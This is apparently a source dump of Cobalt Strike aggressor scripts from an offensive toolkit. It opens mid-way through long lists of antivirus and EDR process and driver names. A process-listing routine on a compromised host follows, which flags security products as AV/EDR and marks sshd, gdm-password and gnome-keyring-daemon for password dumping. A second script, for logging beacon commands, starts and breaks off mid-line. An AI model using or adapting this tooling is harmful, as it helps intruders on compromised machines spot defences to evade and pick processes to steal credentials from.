"EMET_Service", "EMLPROUI", "EMLPROXY", "EMLibUpdateAgentNT", "ETConsole3", "ETCorrel", "ETLogAnalyzer", "ETReporter", "ETRssFeeds", "EUQMonitor", "EndPointSecurity", "EngineServer", "EntityMain", "EtScheduler", "EtwControlPanel", "EventParser", "FAMEH32", "FCDBLog", "FCH32", "FPAVServer", "FProtTray", "FSCUIF", "FSHDLL32", "FSM32", "FSMA32", "FSMB32", "FWCfg", "FireSvc", "FireTray", "FirewallGUI", "ForceField", "FortiProxy", "FortiTray", "FortiWF", "FrameworkService", "FreeProxy", "GDFirewallTray", "GDFwSvc", "HWAPI", "ISNTSysMonitor", "ISSVC", "ISWMGR", "ITMRTSVC", "ITMRT_SupportDiagnostics", "ITMRT_TRACE", "IcePack", "IdsInst", "InoNmSrv", "InoRT", "InoRpc", "InoTask", "InoWeb", "IsntSmtp", "KABackReport", "KANMCMain", "KAVFS", "KAVStart", "KLNAGENT", "KMailMon", "KNUpdateMain", "KPFWSvc", "KSWebShield", "KVMonXP", "KVMonXP_2", "KVSrvXP", "KWSProd", "KWatch", "KavAdapterExe", "KeyPass", "KvXP", "LUALL", "LWDMServer", "LockApp", "LockAppHost", "LogGetor", "MCSHIELD", "MCUI32", "MSASCui", "ManagementAgentNT", "McAfeeDataBackup", "McEPOC", "McEPOCfg", "McNASvc", "McProxy", "McScript_InUse", "McWCE", "McWCECfg", "Mcshield", "Mctray", "MgntSvc", "MpCmdRun", "MpfAgent", "MpfSrv", "MsMpEng", "NAIlgpip", "NAVAPSVC", "NAVAPW32", "NCDaemon", "NIP", "NJeeves", "NLClient", "NMAGENT", "NOD32view", "NPFMSG", "NPROTECT", "NRMENCTB", "NSMdtr", "NTRtScan", "NVCOAS", "NVCSched", "NavShcom", "Navapsvc", "NaveCtrl", "NaveLog", "NaveSP", "Navw32", "Navwnt", "Nip", "Njeeves", "Npfmsg2", "Npfsvice", "NscTop", "Nvcoas", "Nvcsched", "Nymse", "OLFSNT40", "OMSLogManager", "ONLINENT", "ONLNSVC", "OfcPfwSvc", "PASystemTray", "PAVFNSVR", "PAVSRV51", "PNmSrv", "POPROXY", "POProxy", "PPClean", "PPCtlPriv", "PQIBrowser", "PSHost", "PSIMSVC", "PXEMTFTP", "PadFSvr", "Pagent", "Pagentwd", "PavBckPT", "PavFnSvr", "PavPrSrv", "PavProt", "PavReport", "Pavkre", "PcCtlCom", "PcScnSrv", "PccNTMon", "PccNTUpd", "PpPpWallRun", "PrintDevice", "ProUtil", "PsCtrlS", "PsImSvc", "PwdFiltHelp", "Qoeloader", "RAVMOND", "RAVXP", "RNReport", "RPCServ", "RSSensor", "RTVscan", "RapApp", "Rav", "RavAlert", "RavMon", "RavMonD", "RavService", "RavStub", "RavTask", "RavTray", "RavUpdate", "RavXP", "RealMon", "Realmon", "RedirSvc", "RegMech", "ReporterSvc", "RouterNT", "Rtvscan", "SAFeService", "SAService", "SAVAdminService", "SAVFMSESp", "SAVMain", "SAVScan", "SCANMSG", "SCANWSCS", "SCFManager", "SCFService", "SCFTray", "SDTrayApp", "SEVINST", "SMEX_ActiveUpdate", "SMEX_Master", "SMEX_RemoteConf", "SMEX_SystemWatch", "SMSECtrl", "SMSELog", "SMSESJM", "SMSESp", "SMSESrv", "SMSETask", "SMSEUI", "SNAC", "SNAC", "SNDMon", "SNDSrvc", "SPBBCSvc", "SPIDERML", "SPIDERNT", "SSM", "SSScheduler", "SVCharge", "SVDealer", "SVFrame", "SVTray", "SWNETSUP", "SavRoam", "SavService", "SavUI", "ScanMailOutLook", "SeAnalyzerTool", "SemSvc", "SescLU", "SetupGUIMngr", "SiteAdv", "Smc", "SmcGui", "SnHwSrv", "SnICheckAdm", "SnIcon", "SnSrv", "SnicheckSrv", "SpIDerAgent", "SpntSvc", "SpyEmergency", "SpyEmergencySrv", "StOPP", "StWatchDog", "SymCorpUI", "SymSPort", "TBMon", "TFGui", "TFService", "TFTray", "TFun", "TIASPN~1", "TSAnSrf", "TSAtiSy", "TScutyNT", "TSmpNT", "TmListen", "TmPfw", "Tmntsrv", "Traflnsp", "TrapTrackerMgr", "UPSCHD", "UcService", "UdaterUI", "UmxAgent", "UmxCfg", "UmxFwHlp", "UmxPol", "Up2date", "UpdaterUI", "UrlLstCk", "UserActivity", "UserAnalysis", "UsrPrmpt", "V3Medic", "V3Svc", "VPC32", "VPDN_LU", "VPTray", "VSStat", "VsStat", "VsTskMgr", "WEBPROXY", "WFXCTL32", "WFXMOD32", "WFXSNT40", "WebProxy", "WebScanX", "WinRoute", "WrSpySetup", "ZLH", "Zanda", "ZhuDongFangYu", "Zlh", "_avp32", "_avpcc", "_avpm", "aAvgApi", "aawservice", "acaif", "acctmgr", "ackwin32", "aclient", "adaware", "advxdwin", "aexnsagent", "aexsvc", "aexswdusr", "aflogvw", "afwServ", "agentsvr", "agentw", "ahnrpt", "ahnsd", "ahnsdsv", "alertsvc", "alevir", "alogserv", "alsvc", "alunotify", "aluschedulersvc", "amon9x", "amswmagt", "anti-trojan", "antiarp", "antivirus", "ants", "aphost", "apimonitor", "aplica32", "aps", "apvxdwin", "arr", "ashAvast", "ashBug", "ashChest", "ashCmd", "ashDisp", "ashEnhcd", "ashLogV", "ashMaiSv", "ashPopWz", "ashQuick", "ashServ", "ashSimp2", "ashSimpl", "ashSkPcc", "ashSkPck", "ashUpd", "ashWebSv", "ashdisp", "ashmaisv", "ashserv", "ashwebsv", "asupport", "aswDisp", "aswRegSvr", "aswServ", "aswUpdSv", "aswUpdsv", "aswWebSv", "aswupdsv", "atcon", "atguard", "atro55en", "atupdater", "atwatch", "atwsctsk", "au", "aupdate", "aupdrun", "aus", "auto-protect.nav80try", "autodown", "autotrace", "autoup", "autoupdate", "avEngine", "avadmin", "avcenter", "avconfig", "avconsol", "ave32", "avengine", "avesvc", "avfwsvc", "avgam", "avgamsvr", "avgas", "avgcc", "avgcc32", "avgcsrvx", "avgctrl", "avgdiag", "avgemc", "avgfws8", "avgfws9", "avgfwsrv", "avginet", "avgmsvr", "avgnsx", "avgnt", "avgregcl", "avgrssvc", "avgrsx", "avgscanx", "avgserv", "avgserv9", "avgsystx", "avgtray", "avguard", "avgui", "avgupd", "avgupdln", "avgupsvc", "avgvv", "avgw", "avgwb", "avgwdsvc", "avgwizfw", "avkpop", "avkserv", "avkservice", "avkwctl9", "avltmain", "avmailc", "avmcdlg", "avnotify", "avnt", "avp", "avp32", "avpcc", "avpdos32", "avpexec", "avpm", "avpncc", "avps", "avptc32", "avpupd", "avscan", "avsched32", "avserver", "avshadow", "avsynmgr", "avwebgrd", "avwin", "avwin95", "avwinnt", "avwupd", "avwupd32", "avwupsrv", "avxmonitor9x", "avxmonitornt", "avxquar", "backweb", "bargains", "basfipm", "bd_professional", "bdagent", "bdc", "bdlite", "bdmcon", "bdss", "bdsubmit", "beagle", "belt", "bidef", "bidserver", "bipcp", "bipcpevalsetup", "bisp", "blackd", "blackice", "blink", "blss", "bmrt", "bootconf", "bootwarn", "borg2", "bpc", "bpk", "brasil", "bs120", "bundle", "bvt", "bwgo0000", "ca", "caav", "caavcmdscan", "caavguiscan", "caf", "cafw", "caissdt", "capfaem", "capfasem", "capfsem", "capmuamagt", "casc", "casecuritycenter", "caunst", "cavrep", "cavrid", "cavscan", "cavtray", "ccApp", "ccEvtMgr", "ccLgView", "ccProxy", "ccSetMgr", "ccSetmgr", "ccSvcHst", "ccap", "ccapp", "ccevtmgr", "cclaw", "ccnfagent", "ccprovsp", "ccproxy", "ccpxysvc", "ccschedulersvc", "ccsetmgr", "ccsmagtd", "ccsvchst", "ccsystemreport", "cctray", "ccupdate", "cdp", "cfd", "cfftplugin", "cfgwiz", "cfiadmin", "cfiaudit", "cfinet", "cfinet32", "cfnotsrvd", "cfp", "cfpconfg", "cfpconfig", "cfplogvw", "cfpsbmit", "cfpupdat", "cfsmsmd", "checkup", "cka", "clamscan", "claw95", "claw95cf", "clean", "cleaner", "cleaner3", "cleanpc", "cleanup", "click", "cmdagent", "cmdinstall", "cmesys", "cmgrdian", "cmon016", "comHost", "connectionmonitor", "control_panel", "cpd", "cpdclnt", "cpf", "cpf9x206", "cpfnt206", "crashrep", "csacontrol", "csinject", "csinsm32", "csinsmnt", "csrss_tc", "ctrl", "cv", "cwnb181", "cwntdwmo", "cz", "datemanager", "dbserv", "dbsrv9", "dcomx", "defalert", "defscangui", "defwatch", "deloeminfs", "deputy", "diskmon", "divx", "djsnetcn", "dllcache", "dllreg", "doors", "doscan", "dpf", "dpfsetup", "dpps2", "drwagntd", "drwatson", "drweb", "drweb32", "drweb32w", "drweb386", "drwebcgp", "drwebcom", "drwebdc", "drwebmng", "drwebscd", "drwebupw", "drwebwcl", "drwebwin", "drwupgrade", "dsmain", "dssagent", "dvp95", "dvp95_0", "dwengine", "dwhwizrd", "dwwin", "ecengine", "edisk", "efpeadm", "egui", "ekrn", "elogsvc", "emet_agent", "emet_service", "emsw", "engineserver", "ent", "era", "esafe", "escanhnt", "escanv95", "esecagntservice", "esecservice", "esmagent", "espwatch", "etagent", "ethereal", "etrustcipe", "evpn", "evtProcessEcFile", "evtarmgr", "evtmgr", "exantivirus-cnet", "exe.avxw", "execstat", "expert", "explore", "f-agnt95", "f-prot", "f-prot95", "f-stopw", "fameh32", "fast", "fch32", "fih32", "findviru", "firesvc", "firetray", "firewall", "fmon", "fnrb32", "fortifw", "fp-win", "fp-win_trial", "fprot", "frameworkservice", "frminst", "frw", "fsaa", "fsaua", "fsav", "fsav32", "fsav530stbyb", "fsav530wtbyb", "fsav95", "fsavgui", "fscuif", "fsdfwd", "fsgk32", "fsgk32st", "fsguidll", "fsguiexe", "fshdll32", "fsm32", "fsma32", "fsmb32", "fsorsp", "fspc", "fspex", "fsqh", "fssm32", "fwinst", "gator", "gbmenu", "gbpoll", "gcascleaner", "gcasdtserv", "gcasinstallhelper", "gcasnotice", "gcasserv", "gcasservalert", "gcasswupdater", "generics", "gfireporterservice", "ghost_2", "ghosttray", "giantantispywaremain", "giantantispywareupdater", "gmt", "guard", "guarddog", "guardgui", "hacktracersetup", "hbinst", "hbsrv", "hipsvc", "hotactio", "hotpatch", "htlog", "htpatch", "hwpe", "hxdl", "hxiul", "iamapp", "iamserv", "iamstats", "ibmasn", "ibmavsp", "icepack", "icload95", "icloadnt", "icmon", "icsupp95", "icsuppnt", "idle", "iedll", "iedriver", "iface", "ifw2000", "igateway", "inetlnfo", "infus", "infwin", "inicio", "inonmsrv", "inorpc", "inort", "inotask", "intdel", "intren", "iomon98", "isPwdSvc", "isUAC", "isafe", "isafinst", "issvc", "istsvc", "jammer", "jdbgmrg", "jedi", "kaccore", "kansgui", "kansvr", "kastray", "kav", "kav32", "kavfs", "kavfsgt", "kavfsrcn", "kavfsscs", "kavfswp", "kavisarv", "kavlite40eng", "kavlotsingleton", "kavmm", "kavpers40eng", "kavpf", "kavshell", "kavss", "kavstart", "kavsvc", "kavtray", "kazza", "keenvalue", "kerio-pf-213-en-win", "kerio-wrl-421-en-win", "kerio-wrp-421-en-win", "kernel32", "killprocesssetup161", "kis", "kislive", "kissvc", "klnacserver", "klnagent", "klserver", "klswd", "klwtblfs", "kmailmon", "knownsvr", "kpf4gui", "kpf4ss", "kpfw32", "kpfwsvc", "krbcc32s", "kvdetech", "kvolself", "kvsrvxp", "kvsrvxp_1", "kwatch", "kwsprod", "kxeserv", "launcher", "ldnetmon", "ldpro", "ldpromenu", "ldscan", "leventmgr", "livesrv", "lmon", "lnetinfo", "loader", "localnet", "lockdown", "lockdown2000", "log_qtine", "lookout", "lordpe", "lsetup", "luall", "luau", "lucallbackproxy", "lucoms", "lucomserver", "lucoms~1", "luinit", "luspt", "makereport", "mantispm", "mapisvc32", "masalert", "massrv", "mcafeefire", "mcagent", "mcappins", "mcconsol", "mcdash", "mcdetect", "mcepoc", "mcepocfg", "mcinfo", "mcmnhdlr", "mcmscsvc", "mcods", "mcpalmcfg", "mcpromgr", "mcregwiz", "mcscript", "mcscript_inuse", "mcshell", "mcshield", "mcshld9x", "mcsysmon", "mctool", "mctray", "mctskshd", "mcuimgr", "mcupdate", "mcupdmgr", "mcvsftsn", "mcvsrte", "mcvsshld", "mcwce", "mcwcecfg", "md", "mfeann", "mfevtps", "mfin32", "mfw2en", "mfweng3.02d30", "mgavrtcl", "mgavrte", "mghtml", "mgui", "minilog", "mmod", "monitor", "monsvcnt", "monsysnt", "moolive", "mostat", "mpcmdrun", "mpf", "mpfagent", "mpfconsole", "mpfservice", "mpftray", "mps", "mpsevh", "mpsvc", "mrf", "mrflux", "msapp", "msascui", "msbb", "msblast", "mscache", "msccn32", "mscifapp", "mscman", "msconfig", "msdm", "msdos", "msiexec16", "mskagent", "mskdetct", "msksrver", "msksrvr", "mslaugh", "msmgt", "msmpeng", "msmsgri32", "msscli", "msseces", "mssmmc32", "msssrv", "mssys", "msvxd", "mu0311ad", "mwatch", "myagttry", "n32scanw", "nSMDemf", "nSMDmon", "nSMDreal", "nSMDsch", "naPrdMgr", "nav", "navap.navapsvc", "navapsvc", "navapw32", "navdx", "navlu32", "navnt", "navstub", "navw32", "navwnt", "nc2000", "ncinst4"); 16 | 17 | #av 2 18 | @av1 = @("MSASCuiL", "CylanceSvc", "ndd32", "ndetect", "neomonitor", "neotrace", "neowatchlog", "netalertclient", "netarmor", "netcfg", "netd32", "netinfo", "netmon", "netscanpro", "netspyhunter-1.2", "netstat", "netutils", "networx", "ngctw32", "ngserver", "nip", "nipsvc", "nisoptui", "nisserv", "nisum", "njeeves", "nlsvc", "nmain", "nod32", "nod32krn", "nod32kui", "normist", "norton_internet_secu_3.0_407", "notstart", "npf40_tw_98_nt_me_2k", "npfmessenger", "npfmntor", "npfmsg", "nprotect", "npscheck", "npssvc", "nrmenctb", "nsched32", "nscsrvce", "nsctop", "nsmdtr", "nssys32", "nstask32", "nsupdate", "nt", "ntcaagent", "ntcadaemon", "ntcaservice", "ntrtscan", "ntvdm", "ntxconfig", "nui", "nupgrade", "nvarch16", "nvc95", "nvcoas", "nvcsched", "nvsvc32", "nwinst4", "nwservice", "nwtool16", "nymse", "oasclnt", "oespamtest", "ofcdog", "ofcpfwsvc", "okclient", "olfsnt40", "ollydbg", "onsrvr", "op_viewer", "opscan", "optimize", "ostronet", "otfix", "outpost", "outpostinstall", "outpostproinstall", "paamsrv", "padmin", "pagent", "pagentwd", "panixk", "patch", "pavbckpt", "pavcl", "pavfires", "pavfnsvr", "pavjobs", "pavkre", "pavmail", "pavprot", "pavproxy", "pavprsrv", "pavsched", "pavsrv50", "pavsrv51", "pavsrv52", "pavupg", "pavw", "pccNT", "pccclient", "pccguide", "pcclient", "pccnt", "pccntmon", "pccntupd", "pccpfw", "pcctlcom", "pccwin98", "pcfwallicon", "pcip10117_0", "pcscan", "pctsAuxs", "pctsGui", "pctsSvc", "pctsTray", "pdsetup", "pep", "periscope", "persfw", "perswf", "pf2", "pfwadmin", "pgmonitr", "pingscan", "platin", "pmon", "pnmsrv", "pntiomon", "pop3pack", "pop3trap", "poproxy", "popscan", "portdetective", "portmonitor", "powerscan", "ppinupdt", "ppmcativedetection", "pptbc", "ppvstop", "pqibrowser", "pqv2isvc", "prevsrv", "prizesurfer", "prmt", "prmvr", "programauditor", "proport", "protectx", "psctris", "psh_svc", "psimreal", "psimsvc", "pskmssvc", "pspf", "purge", "pview", "pviewer", "pxemtftp", "pxeservice", "qclean", "qconsole", "qdcsfs", "qoeloader", "qserver", "rapapp", "rapuisvc", "ras", "rasupd", "rav7", "rav7win", "rav8win32eng", "ravmon", "ravmond", "ravstub", "ravxp", "ray", "rb32", "rcsvcmon", "rcsync", "realmon", "reged", "remupd", "reportsvc", "rescue", "rescue32", "rfwmain", "rfwproxy", "rfwsrv", "rfwstub", "rnav", "rrguard", "rshell", "rsnetsvr", "rstray", "rtvscan", "rtvscn95", "rulaunch", "saHookMain", "safeboxtray", "safeweb", "sahagentscan32", "sav32cli", "save", "savenow", "savroam", "savscan", "savservice", "sbserv", "scam32", "scan32", "scan95", "scanexplicit", "scanfrm", "scanmailoutlook", "scanpm", "schdsrvc", "schupd", "scrscan", "seestat", "serv95", "setloadorder", "setup_flowprotector_us", "setupguimngr", "setupvameeval", "sfc", "sgssfw32", "shellspyinstall", "shn", "showbehind", "shstat", "siteadv", "smOutlookPack", "smc", "smoutlookpack", "sms", "smsesp", "smss32", "sndmon", "sndsrvc", "soap", "sofi", "softManager", "spbbcsvc", "spf", "sphinx", "spideragent", "spiderml", "spidernt", "spiderui", "spntsvc", "spoler", "spoolcv", "spoolsv32", "spyxx", "srexe", "srng", "srvload", "srvmon", "ss3edit", "sschk", "ssg_4104", "ssgrate", "st2", "stcloader", "stinger", "stopp", "stwatchdog", "supftrl", "support", "supporter5", "svcGenericHost", "svcharge", "svchostc", "svchosts", "svcntaux", "svdealer", "svframe", "svtray", "swdsvc", "sweep95", "sweepnet.sweepsrv.swnetsup", "sweepsrv", "swnetsup", "swnxt", "swserver", "symlcsvc", "symproxysvc", "symsport", "symtray", "symwsc", "sysdoc32", "sysedit", "sysupd", "taskmo", "taumon", "tbmon", "tbscan", "tc", "tca", "tclproc", "tcm", "tdimon", "tds-3", "tds2-98", "tds2-nt", "teekids", "tfak", "tfak5", "tgbob", "titanin", "titaninxp", "tmas", "tmlisten", "tmntsrv", "tmpfw", "tmproxy", "tnbutil", "tpsrv", "tracesweeper", "trickler", "trjscan", "trjsetup", "trojantrap3", "trupd", "tsadbot", "tvmd", "tvtmd", "udaterui", "undoboot", "unvet32", "updat", "updtnv28", "upfile", "upgrad", "uplive", "urllstck", "usergate", "usrprmpt", "utpost", "v2iconsole", "v3clnsrv", "v3exec", "v3imscn", "vbcmserv", "vbcons", "vbust", "vbwin9x", "vbwinntw", "vcsetup", "vet32", "vet95", "vetmsg", "vettray", "vfsetup", "vir-help", "virusmdpersonalfirewall", "vnlan300", "vnpc3000", "vpatch", "vpc32", "vpc42", "vpfw30s", "vprosvc", "vptray", "vrv", "vrvmail", "vrvmon", "vrvnet", "vscan40", "vscenu6.02d30", "vsched", "vsecomr", "vshwin32", "vsisetup", "vsmain", "vsmon", "vsserv", "vsstat", "vstskmgr", "vswin9xe", "vswinntse", "vswinperse", "w32dsm89", "w9x", "watchdog", "webdav", "webproxy", "webscanx", "webtrap", "webtrapnt", "wfindv32", "wfxctl32", "wfxmod32", "wfxsnt40", "whoswatchingme", "wimmun32", "win-bugsfix", "winactive", "winmain", "winnet", "winppr32", "winrecon", "winroute", "winservn", "winssk32", "winstart", "winstart001", "wintsk32", "winupdate", "wkufind", "wnad", "wnt", "wradmin", "wrctrl", "wsbgate", "wssfcmai", "wupdater", "wupdt", "wyvernworksfirewall", "xagt", "xagtnotif", "xcommsvr", "xfilter", "xpf202en", "zanda", "zapro", "zapsetup3001", "zatutor", "zhudongfangyu", "zlclient", "zlh", "zonalm2601", "zonealarm"); 19 | 20 | #edr 21 | @edr = @("CiscoAMPCEFWDriver", "CiscoAMPHeurDriver", "cbstream", "cbk7", "Parity", "libwamf", "LRAgentMF", "BrCow_x_x_x_x", "brfilter", "BDSandBox", "TRUFOS", "AVC3", "Atc", "AVCKF", "bddevflt", "gzflt", "bdsvm", "hbflt", "cve", "psepfilter", "cposfw", "dsfa", "medlpflt", "epregflt", "TmFileEncDmk", "tmevtmgr", "TmEsFlt", "fileflt", "SakMFile", "SakFile", "AcDriver", "TMUMH", "hfileflt", "TMUMS", "MfeEEFF", "mfprom", "hdlpflt", "swin", "mfehidk", "mfencoas", "epdrv", "carbonblackk", "csacentr", "csaenh", "csareg", "csascr", "csaav", "csaam", "esensor", "fsgk", "fsatp", "fshs", "eaw", "im", "csagent", "rvsavd", "dgdmk", "atrsdfw", "mbamwatchdog", "edevmon", "SentinelMonitor", "edrsensor", "ehdrv", "HexisFSMonitor", "CyOptics", "CarbonBlackK", "CyProtectDrv32", "CyProtectDrv64", "CRExecPrev", "ssfmonm", "CybKernelTracker", "SAVOnAccess", "savonaccess", "sld", "aswSP", "FeKern", "klifks", "klifaa", "Klifsm", "mfeaskm", "mfencfilter", "WFP_MRT", "groundling32", "SAFE-Agent", "groundling64", "avgtpx86", "avgtpx64", "pgpwdefs", "GEProtection", "diflt", "sysMon", "ssrfsf", "emxdrv2", "reghook", "spbbcdrv", "bhdrvx86", "bhdrvx64", "SISIPSFileFilter", "symevent", "VirtualAgent", "vxfsrep", "VirtFile", "SymAFR", "symefasi", "symefa", "symefa64", "SymHsm", "evmf", "GEFCMP", "VFSEnc", "pgpfs", "fencry", "symrg", "cfrmd", "cmdccav", "cmdguard", "CmdMnEfs", "MyDLPMF", "PSINPROC", "PSINFILE", "amfsm", "amm8660", "amm6460"); 22 | @admin = @("ssh", "zabbix_agentd", "zabbix_server", "vim", "top", "nc", "vnc", "telnet"); 23 | @login = @("sshd", "lightdm", "gnome-keyring-daemon", "gdm-password", "vsftpd", "apache2"); 24 | @browsers = @("chrome", "chromuim", "firefox", "safari"); 25 | 26 | 27 | sub lcarray { 28 | @array = $1; 29 | foreach $index => $value(@array) { 30 | @array[$index] = lc($value); 31 | } 32 | return @array; 33 | } 34 | 35 | sub format_ps{ 36 | global('@av @av1 @edr @admin @login @browsers'); 37 | $bid = $1; 38 | $bd = bdata($1); 39 | $computer = beacon_info($1, "computer"); 40 | $si = indexOf($computer, "("); 41 | $si = $si + 1; 42 | $ei = indexOf($computer, ")"); 43 | $realpid = substr($computer, $si, $ei); 44 | 45 | @format_av = map({ return lc(mid($1, 0, 15)); }, @av); 46 | @format_av1 = map({ return lc(mid($1, 0, 15)); }, @av1); 47 | @format_edr = map({ return lc(mid($1, 0, 15)); }, @edr); 48 | @format_admin = map({ return lc(mid($1, 0, 15)); }, @admin); 49 | @format_login = map({ return lc(mid($1, 0, 15)); }, @login); 50 | 51 | # @av = lcarray(@av); 52 | # @av1 = lcarray(@av1); 53 | # @admin = lcarray(@admin); 54 | 55 | global('@ps @final_ps @reverse_ps @temp_ps'); 56 | local('$outps $temp $name $ppid $pid $arch $user $session'); 57 | $outps .= "\cC[*]\o Process List with process highlighting\n"; 58 | $outps .= "\cC[*]\o Current Running PID: \c8 Yellow ". $realpid ." \o \n"; 59 | $outps .= "\cC[*]\o Explorer/Winlogon: \c2 BLUE \o \n"; 60 | $outps .= "\cC[*]\o Admin Tools: \cB LIGHT BLUE \o \n"; 61 | $outps .= "\cC[*]\o Browsers: \c3 GREEN \o \n"; 62 | $outps .= "\cC[*]\o AV/EDR: \c4 RED \o \n\n"; 63 | $outps .= " PID PPID Name User TTY Path\n"; 64 | $outps .= "\cE --- ---- ---- ---- ------- ----\n"; 65 | 66 | foreach $temp (split("\n", ["$2" trim])) { 67 | ($name, $ppid, $pid, $arch, $user, $session) = split("\t", $temp); 68 | $name = substr($name, 1, lindexOf($name, ")")); 69 | @tempLine = @(pid => $pid, ppid => $ppid, pid_formatted => "$[5]pid", ppid_formatted => "$[5]ppid", color => "\c4", name => $name, arch => "$[5]arch", session => "$[11]session", user => $user); 70 | 71 | 72 | $lname = lc($name); 73 | 74 | # highlight current process in YELLOW 75 | if ($pid == $realpid) { 76 | push(@ps, %(pid => $pid, ppid => $ppid, pid_formatted => "$[5]pid", ppid_formatted => "$[5]ppid", color => "\c8", name => $name.' (beacon)', arch => "$[5]arch", session => "$[11]session", user => $user)); 77 | } 78 | 79 | # highlight AV processes in RED. 80 | else if(iff($lname in @format_av,true,false)) { 81 | push(@ps, %(pid => $pid, ppid => $ppid, pid_formatted => "$[5]pid", ppid_formatted => "$[5]ppid", color => "\c4", name => $name.' (AV)', arch => "$[5]arch", session => "$[11]session", user => $user)); 82 | } 83 | 84 | # highlight AV processes in RED. 85 | else if (iff($lname in @format_av1,true,false)) { 86 | push(@ps, %(pid => $pid, ppid => $ppid, pid_formatted => "$[5]pid", ppid_formatted => "$[5]ppid", color => "\c4", name => $name.' (AV)', arch => "$[5]arch", session => "$[11]session", user => $user)); 87 | } 88 | 89 | else if (iff($lname in @format_edr,true,false)) { 90 | push(@ps, %(pid => $pid, ppid => $ppid, pid_formatted => "$[5]pid", ppid_formatted => "$[5]ppid", color => "\c4", name => $name.' (EDR)', arch => "$[5]arch", session => "$[11]session", user => $user)); 91 | } 92 | 93 | # highlight explorer , winlogon in BLUE 94 | # map({ return "$1 :)"; }, @array); 95 | # else if (iff($lname in @login,true,false)) { 96 | else if (iff($lname in @format_login,true,false)) { 97 | push(@ps, %(pid => $pid, ppid => $ppid, pid_formatted => "$[5]pid", ppid_formatted => "$[5]ppid", color => "\c2", name => $name.' (dump password)', arch => "$[5]arch", session => "$[11]session", user => $user)); 98 | } 99 | 100 | # highlight browsers processes in GREEN 101 | else if (iff($lname in @browsers,true,false)) { 102 | push(@ps, %(pid => $pid, ppid => $ppid, pid_formatted => "$[5]pid", ppid_formatted => "$[5]ppid", color => "\c3", name => $name, arch => "$[5]arch", session => "$[11]session", user => $user)); 103 | } 104 | 105 | # highlight Admin Tools in Light Blue 106 | # Arsenii: small bug fix to not include if this is our beacon PID 107 | else if(iff($lname in @format_admin && $pid != $realpid,true,false)) { 108 | push(@ps, %(pid => $pid, ppid => $ppid, pid_formatted => "$[5]pid", ppid_formatted => "$[5]ppid", color => "\cB", name => $name.' (tools)', arch => "$[5]arch", session => "$[11]session", user => $user)); 109 | } 110 | 111 | else { 112 | push(@ps, %(pid => $pid, ppid => $ppid, pid_formatted => "$[5]pid", ppid_formatted => "$[5]ppid", color => "", name => $name, arch => "$[5]arch", session => "$[11]session", user => $user)); 113 | } 114 | } 115 | # sort the processes please 116 | sort({ return $1['pid'] <=> $2['pid']; }, @ps); 117 | 118 | # get the @ps array in a reverse order for the ascending child sorting order 119 | @reverse_ps = reverse(@ps); 120 | 121 | 122 | # this function will find all orphan processes and add them to the final_ps. Those will be in the root of the process tree 123 | sub buildOrphanage{ 124 | for ($counter4 = 0; $counter4 < size($1); $counter4++){ 125 | $orphan = true; 126 | 127 | for ($counter5 = 0; $counter5 < size($1); $counter5++){ 128 | if ($1[$counter4]['ppid'] == $1[$counter5]['pid']){ 129 | $orphan = false; 130 | break; 131 | } 132 | } 133 | 134 | # PID zero - its gotta be an orphan, poor kid 135 | if ($1[$counter4]['pid'] == 0){ 136 | $orphan = true; 137 | } 138 | 139 | 140 | if ($orphan == true){ 141 | #set indentation and push to the @final_ps 142 | $1[$counter4]['indent'] = ""; 143 | push($2, $1[$counter4]); 144 | } 145 | } 146 | } 147 | 148 | # finds an index of a given PID in the array 149 | sub findArrayElement{ 150 | foreach $index => $value ($1){ 151 | if ($1[$index]['pid'] == $2){ 152 | return $index; 153 | } 154 | } 155 | return $null; 156 | } 157 | 158 | # adds parent and all of its children to a temp_ps which then being copied into a final_ps 159 | sub addChildrenProcesses{ 160 | # for every parent in the current final_ps 161 | foreach $parent ($2){ 162 | 163 | # check if that parent is already there 164 | $arrayIndex = findArrayElement($1, $parent['pid']); 165 | 166 | # if the parent is not there - add it first 167 | if ($arrayIndex == $null){ 168 | #add the parent first 169 | push($1, $parent); 170 | 171 | # update arrayIndex for children to follow 172 | $arrayIndex = size($1) - 1; 173 | } 174 | 175 | #now find all the children of the process and insert those right under the parent 176 | foreach $potentialChild ($3){ 177 | if ($potentialChild['ppid'] == $parent['pid'] && $potentialChild['ppid'] != $potentialChild['pid']){ 178 | $potentialChild['indent'] = $parent['indent'] . " "; 179 | add($1, $potentialChild, $arrayIndex + 1); 180 | } 181 | } 182 | } 183 | # update @final_ps 184 | $2 = copy($1); 185 | # clear temp_ps 186 | clear($1); 187 | } 188 | 189 | buildOrphanage(@ps, @final_ps); 190 | 191 | # until @final_ps is not going to be the same size as @ps, keep adding children 192 | # WARNING: if something doesnt work correctly (variable scope??) this will create an infinite loop with Cobalt Strike hanging itself 193 | while (size(@final_ps) < size(@ps)){ 194 | addChildrenProcesses(@temp_ps, @final_ps, @reverse_ps); 195 | $final_ps_size = size(@final_ps); 196 | } 197 | 198 | 199 | # in case of an infinite loop, this can be used to debug 200 | # for ($counter1 = 0; $counter1 < 10; $counter1++){ 201 | # addChildrenProcesses(@temp_ps, @final_ps, @reverse_ps); 202 | 203 | # } 204 | 205 | # append to our outstring 206 | foreach $temp (@final_ps) { 207 | # for some reason this was the best way to format that string 208 | $temp_name = $temp['indent'] . $temp['name']; 209 | 210 | # $outps .= "$temp['color'] $temp['pid_formatted'] $temp['ppid_formatted'] $[38]temp_name $temp['arch'] $temp['session'] $temp['user']\o\n"; 211 | $outps .= "$temp['color'] $temp['pid_formatted'] $temp['ppid_formatted'] $[38]temp_name $temp['user'] $temp['session'] $temp['arch']\o\n"; 212 | } 213 | 214 | # clear these arrays since for some reason they persist after each aggressor script run 215 | clear(@final_ps); 216 | clear(@ps); 217 | 218 | blog($bid, $outps); 219 | } 220 | 221 | ssh_alias ps { 222 | bps($1, &format_ps); 223 | } -------------------------------------------------------------------------------- /utils/logvis.cna: -------------------------------------------------------------------------------- 1 | # Beacon Command Log visualization 2 | # Author: @001SPARTaN (for @r3dqu1nn) 3 | # Tracks all your commands you executed on every beacon 4 | 5 | import ui.*; 6 | import table.*; 7 | 8 | import java.awt.*; 9 | import javax.swing.*; 10 | import javax.swing.table.*; 11 | 12 | global('$sshlog_model $sshlog_content $sshlog_table'); 13 | 14 | sub updateSSHLogTable { 15 | fork({ 16 | local('$entry'); 17 | 18 | # Clear the model so we can put new stuff in it. 19 | [$sshlog_model clear: 1024]; 20 | 21 | foreach @entry (data_query('beaconlog')) { 22 | if (@entry[0] eq "ssh_input") { 23 | %modelEntry['operator'] = @entry[2]; 24 | $bid = @entry[1]; 25 | %modelEntry['ip'] = binfo($bid, "internal"); 26 | %modelEntry['hostname'] = binfo($bid, "computer"); 27 | %modelEntry['user'] = 